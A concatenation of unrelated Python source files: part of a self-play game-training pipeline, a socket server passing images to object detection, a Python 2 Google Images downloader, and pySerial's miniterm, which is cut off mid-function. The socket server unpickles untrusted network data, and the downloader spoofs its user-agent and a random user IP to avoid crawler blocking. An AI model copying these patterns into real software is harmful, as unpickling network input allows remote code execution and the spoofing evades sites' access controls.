random_index = list(range(len(shared_queue)))
random.shuffle(random_index)
mini_batch = []
for i in range(self.batch_size):
mini_batch.append(shared_queue[random_index[i]])
state_batch = [data[0] for data in mini_batch]
mcts_probs_batch = [data[1] for data in mini_batch]
winner_batch = [data[2] for data in mini_batch]
old_probs, old_v = current_policy_value_net.policy_value(state_batch)
for i in range(self.epochs):
loss, entropy = current_policy_value_net.train_step(
state_batch,
mcts_probs_batch,
winner_batch,
self.learn_rate * lr_multiplier)
new_probs, new_v = current_policy_value_net.policy_value(state_batch)
kl = np.mean(np.sum(old_probs * (
np.log(old_probs + 1e-10) - np.log(new_probs + 1e-10)),
axis=1)
)
if kl > self.kl_targ * 4: # early stopping if D_KL diverges badly
break
# adaptively adjust the learning rate
if kl > self.kl_targ * 2 and lr_multiplier > 0.1:
lr_multiplier /= 1.5
elif kl < self.kl_targ / 2 and lr_multiplier < 10:
lr_multiplier *= 1.5
explained_var_old = (1 -
np.var(np.array(winner_batch) - old_v.flatten()) /
np.var(np.array(winner_batch)))
explained_var_new = (1 -
np.var(np.array(winner_batch) - new_v.flatten()) /
np.var(np.array(winner_batch)))
logging.info("update process kl:{:.5f},lr_multiplier:{:.3f},loss:{},entropy:{},explained_var_old:{:.3f},explained_var_new:{:.3f}".format(
kl,
lr_multiplier,
loss,
entropy,
explained_var_old,
explained_var_new))
# summary for tensorboard
if index % self.summary_record_freq == 0:
current_policy_value_net.summary_record(
state_batch,
mcts_probs_batch,
winner_batch,
index,
)
return lr_multiplier
def update_net_thread(self, shared_queue, net_lock, data_lock, stop_update_process, update_best_model):
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
from policy_value_net_tensorflow import PolicyValueNet
logging.info('update process start')
# 读取和写入模型文
current_policy_value_net = PolicyValueNet(self.board_width, self.board_height, model_dir)
current_policy_value_net.save_model(current_model_name)
current_policy_value_net.save_model(best_model_name)
best_win_ratio = 0
get_enough_train_data = False
global_update_step = 0
lr_multiplier = 1.0
while stop_update_process.value == 0:
time.sleep(1)
if get_enough_train_data:
global_update_step += 1
logging.info('update process start {} th self train'.format(global_update_step))
lr_multiplier = self.policy_update(current_policy_value_net, shared_queue, net_lock, data_lock, global_update_step, lr_multiplier)
logging.info('update process end {} th self train'.format(global_update_step))
# 这里更新最新模型文件
logging.info('update process ask net lock')
with net_lock:
logging.info('update process get net lock')
current_policy_value_net.save_model(current_model_name)
logging.info('update process release net lock')
if (global_update_step + 1) % self.update_freq == 0:
update_best_model.value = 1
else:
with data_lock:
get_enough_train_data = len(shared_queue) >= self.batch_size
logging.info('update process finished')
def update_best_model_thread(self, current_model_name, best_model_name, net_lock, update_best_model, stop_update_process):
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
def update_best_model_local_process_func(name1, name2):
from policy_value_net_tensorflow import PolicyValueNet
PolicyValueNet(self.board_width, self.board_height, model_file=name1).save_model(name2)
update_best_model_global_num = 0
update_best_model_time = 0
logging.info('update best model process start!')
while stop_update_process.value == 0:
if update_best_model.value == 1:
update_best_model_global_num += 1
logging.info('update best model process global_num:{}'.format(update_best_model_global_num))
win_num = 0
start_player = 0
with net_lock:
p = multiprocessing.Process(target=update_best_model_local_process_func, args=(current_model_name, temp_current_model_name))
p.start()
p.join()
for i in range(20):
board = Board(width=self.board_width, height=self.board_height, n_in_row=self.n_in_row)
game = Game(board)
logging.info('update best model process start {} th local game, first move player {}'.format(i, start_player))
win_player = game.two_net_play(temp_current_model_name, best_model_name, net_lock, start_player=start_player, is_shown=1)
logging.info('update best model process {} th local game finished, win player is {}'.format(i, win_player))
start_player = 1 - start_player # play first in turn
if win_player == 0:
win_num += 1
logging.info('update best model process global_num:{} finished, current model win total {}'.format(update_best_model_global_num, win_num))
if win_num >= 11:
update_best_model_time += 1
logging.info('update best model process get new best model:{}'.format(update_best_model_time))
p = multiprocessing.Process(target=update_best_model_local_process_func, args=(temp_current_model_name, best_model_name))
p.start()
p.join()
update_best_model.value = 0
def run(self):
"""run the training pipeline"""
try:
# 必须在一个线程中引入tensorflow,否则会造成其他线程由于错误阻塞。
# ERROR: could not retrieve CUDA device count: CUDA_ERROR_NOT_INITIALIZED
m = Manager()
shared_queue = m.list()
net_lock = m.Lock()
data_lock = m.Lock()
stop_update_process = multiprocessing.Value('i', 0)
update_best_model = multiprocessing.Value('i', 0)
update_process = multiprocessing.Process(target=self.update_net_thread,
args=(shared_queue, net_lock, data_lock, stop_update_process, update_best_model))
update_process.start()
time.sleep(5)
pro_list = []
for i in range(self.process_num):
pro = multiprocessing.Process(target=self.collect_selfplay_data_thread, args=(i, shared_queue, net_lock, data_lock))
pro_list.append(pro)
pro.start()
time.sleep(1)
update_best_model_process = multiprocessing.Process(target=self.update_best_model_thread,
args=(current_model_name, best_model_name, net_lock, update_best_model, stop_update_process))
update_best_model_process.start()
# 保证模型基本启动完成
time.sleep(self.main_process_wait_time)
all_finished = True
while update_process.is_alive():
for pro in pro_list:
if pro.is_alive():
all_finished = False
break
if all_finished:
stop_update_process.value = 1
time.sleep(300)
except Exception as e:
logging.error('quit')
if __name__ == '__main__':
training_pipeline = TrainPipeline()
logging.info('start training')
training_pipeline.run()
logging.info('all finished')
|
TfServer.py
|
import time
from threading import Thread, Event
import socket
import cv2
import pickle
import struct
from detection import Obj_Detection
"""
COPYRIGHT @ Grebtsew 2019
TfServer recieves a couple of connections, reads images from incomming streams
and send detections to the QtServer
"""
QtServer_address= [["127.0.0.1",8081]]
class TfServer(Thread):
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 8585 # Port to listen on (non-privileged ports are > 1023)
def __init__(self):
super(TfServer, self).__init__()
print("Tensorflow Server started at ", self.HOST, self.PORT)
# Start detections
self.tf_thread = Obj_Detection()
# Setup output socket
print("Tensorflow Server try connecting to Qt Server ", QtServer_address[0][0],QtServer_address[0][1])
self.outSocket = socket.socket()
self.outSocket.connect((QtServer_address[0][0],QtServer_address[0][1]))
print("SUCCESS : Tensorflow Server successfully connected to Qt Server!", )
def handle_connection(self, conn):
with conn:
data = b""
payload_size = struct.calcsize(">L")
while True:
# Recieve image package size
while len(data) < payload_size:
#print("Recv: {}".format(len(data)))
data += conn.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
#print("msg_size: {}".format(msg_size))
# Recieve image
while len(data) < msg_size:
data += conn.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
# Decode image
frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
# do detetions
self.tf_thread.frame = frame
self.tf_thread.run_async()
detect_res = self.tf_thread.get_result()
# send detection result to QtServer
if detect_res is not None:
self.send(detect_res)
def send(self, data):
self.outSocket.sendall(pickle.dumps(data))
def run(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as inSocket:
inSocket.bind((self.HOST, self.PORT))
inSocket.listen()
while True:
conn, addr = inSocket.accept()
Thread(target=self.handle_connection, args=(conn,)).start()
if __name__ == '__main__':
tfserver = TfServer().start()
|
googleimages_dsk.py
|
"""Google Image Downloader
Original written by Neeraj Kumar <me@neerajkumar.org>
DO NOT DISTRIBUTE!
"""
from PIL import Image
import os, sys, time
import urllib
import random
from Queue import Queue
# GLOBALS
# queues for managing downloads
dlq = Queue()
outq = Queue()
# number of simultaneous download threads
NDLTHREADS = 16
# the API requires you to set these variables:
REFERRER = 'http://cnet.com/'
#USERIP = '24.18.226.243'
USERIP = '24.18.226.' + str(random.randint(100, 250))
class CustomURLopener(urllib.FancyURLopener):
"""Custom url opener that defines a new user-agent.
Needed so that sites don't block us as a crawler."""
version = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
def prompt_user_passwd(host, realm):
"""Custom user-password func for downloading, to make sure that we don't block"""
return ('', '')
urllib._urlopener = CustomURLopener()
def spawnWorkers(num, target, name=None, args=(), kwargs={}, daemon=1, interval=0):
"""Spawns the given number of workers, by default daemon, and returns a list of them.
'interval' determines the time delay between each launching"""
from threading import Thread
threads = []
for i in range(num):
t = Thread(target=target, name=name, args=args, kwargs=kwargs)
t.setDaemon(daemon)
t.start()
threads.append(t)
time.sleep(interval)
return threads
def dlthread(dlq=dlq, outq=outq):
"""An infinite loop which downloads images from dlq.
Each item in dlq should be a (url, fname, callback).
Downloads to fname, creating parent dirs.
Once it's downloaded, puts (url, fname) on outq.
On error, puts (url, None) on outq.
If callback is not None, then calls it with (url, fname).
"""
from urllib import urlretrieve
while 1:
u, f, callback = dlq.get()
if not u: break
try:
os.makedirs(os.path.dirname(f))
except OSError: pass
try:
fname, junk = urlretrieve(u, f)
except Exception, e:
print >>sys.stderr, 'Exception on %s -> %s: %s' % (u, f, e)
fname = None
outq.put((u,fname))
if callback:
callback(u, fname)
# spawn the download threads
dlthreads = spawnWorkers(NDLTHREADS, dlthread, interval=0)
class GoogleImages(object):
"""A google images searcher"""
def __init__(self, outdir='/projects/grail/santosh/objectNgrams/results/ngramPruning/horse/images/', **dlkw):
"""Initializes with simple setup.
Also accepts kwargs, which will be used when constructing the url.
See https://developers.google.com/image-search/v1/jsondevguide for details.
By default, the following args are set:
imgc=color|gray
imgsz='small|medium|large|xlarge|xxlarge|huge' (notice that 'icon' is missing)
imgtype='photo' (other options: face, clipart, lineart, None (for all)
"""
self.outdir = outdir
self.dlkw = dict(imgsz='small|medium|large|xlarge|xxlarge|huge', imgtype='photo',imgc='color')
self.dlkw.update(dlkw)
def _dl(self, q, downdir, urlstring, callback=None, limit=0, delay=0.01):
"""Main internal download function.
Given a search term as 'q', downloads images to our outdir.
Returns (allret, urls, fnames), where:
allret is a list of result dicts from google images
urls is a list of thumbnail urls
fnames is a list of downloaded image paths
Note that the output images are at self.outdir/q/imageid.jpg
If you pass a callback, it's called for each individual image downloaded:
callback(idx, result obj, path)
where:
'idx' is the index of the downloaded image (not necessarily in order),
'result obj' is the object returned by the google API, and
'path' is the path to the downloaded image
You can optionally pass a limit >0 to limit results to that many.
The delay is used to busy-wait-sleep at the end, waiting for all images to download
urlstring can be 'tbUrl' or 'url'
"""
import urllib2
from urllib import quote_plus
try:
import simplejson as json
except ImportError:
import json
todo = {}
ret = []
"""dir = os.path.join(downdir, q)"""
dir = downdir
def wrapped_callback(url, fname, todo=todo, ret=ret, callback=callback):
"""Wrap the user callback here.
Also do other bookkeeping."""
r = todo.get(url, None)
if r and fname:
ret.append((r, url, fname))
if callback:
callback(len(ret)-1, r, fname)
todo.pop(url, None)
# iterate through different pages (can't get more than 8 per page)
# google only supports upto 64 results
#TODO see if we can simultaneously make all requests, or if that speeds things up
t1 = time.time()
for start in [0, 8, 16, 24, 32, 40, 48, 56]:
# note that we exclude very small image sizes
d = dict(userip=USERIP, q=quote_plus(q), start=start)
url = 'https://ajax.googleapis.com/ajax/services/search/images?v=1.0&q=%(q)s&userip=%(userip)s&rsz=8&start=%(start)d' % (d)
# also add our dlkw
url += ''.join(['&%s=%s' % (k, v) for k, v in self.dlkw.iteritems() if v])
request = urllib2.Request(url, None, {'Referer': REFERRER})
response = urllib2.urlopen(request)
results = json.load(response)['responseData']['results']
if not results: break
for r in results:
url = r[urlstring]
fname = os.path.join(dir, '%s.jpg' % r['imageId'])
todo[url] = r
dlq.put((url, fname, wrapped_callback))
if limit > 0 and len(ret) >= limit: break
# wait until all todo are done
while 1:
if not todo: break
if limit > 0 and len(ret) >= limit: break
time.sleep(delay)
if ret:
if limit > 0:
ret = ret[:limit]
return zip(*ret)
return ([], [], [])
def getthumbs(self, term, downdir, urlstring, callback=None, limit=0):
"""Downloads all thumbnails for the given term (if needed).
Checks for a json file in the appropriate location first.
If you pass a callback, it's called for each individual image downloaded:
callback(idx, result obj, path)
where:
'idx' is the index of the downloaded image (not necessarily in order),
'result obj' is the object returned by the google API, and
'path' is the path to the downloaded image
You can optionally pass a limit >0 to limit results to that many.
Returns a list of valid image filenames.
"""
try:
import simplejson as json
except ImportError:
import json
"""dir = os.path.join(downdir, term)"""
dir = downdir
jsonfname = os.path.join(dir, 'index.json')
try:
results = json.load(open(jsonfname))
# we still need to call the callbacks
if callback:
for i, (r, im) in enumerate(zip(results['results'], results['thumbfnames'])):
if limit > 0 and i >= limit: break
callback(i, r, im)
except Exception:
# we don't have valid results, so re-download
ret, urls, fnames = self._dl(term, downdir, urlstring, callback=callback, limit=limit)
results = dict(results=ret, thumburls=urls, thumbfnames=fnames)
try:
os.makedirs(os.path.dirname(jsonfname))
except OSError: pass
json.dump(results, open(jsonfname, 'w'), indent=2)
# at this point, we have results one way or the other
return results['thumbfnames'][:limit] if limit > 0 else results['thumbfnames']
def testgoog():
"""Tests the google image downloader"""
G = GoogleImages()
start = time.time()
downdir = sys.argv[1]
urlstring = sys.argv[2]
for term in sys.argv[3:]:
done = 0
attempt = 0
while not done:
attempt += 1
# next three lines added by dsk
if attempt > 10:
print 'Too many attempts, so quitting'
break
try:
t1 = time.time()
print 'Attempt #%d to download images for term "%s" (%0.3fs elapsed since start)' % (attempt, term, t1-start)
def callback(idx, obj, fname):
"""Simple callback that prints info"""
print ' For term "%s" got image #%d in %0.3fs: %s' % (term, idx+1, time.time()-t1, fname)
ret = G.getthumbs(term, downdir, urlstring, callback=callback)
print 'Downloaded %d images in %0.3f secs for query "%s"\n' % (len(ret), time.time()-t1, term)
done = 1
except Exception, e:
print 'Caught exception %s, so sleeping for a bit' % (e,)
time.sleep(10)
time.sleep(0.1)
if __name__ == '__main__':
testgoog()
|
miniterm.py
|
#!C:\MicroPythonProjects\ch3\pyboard_1_1\venv\Scripts\python.exe
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
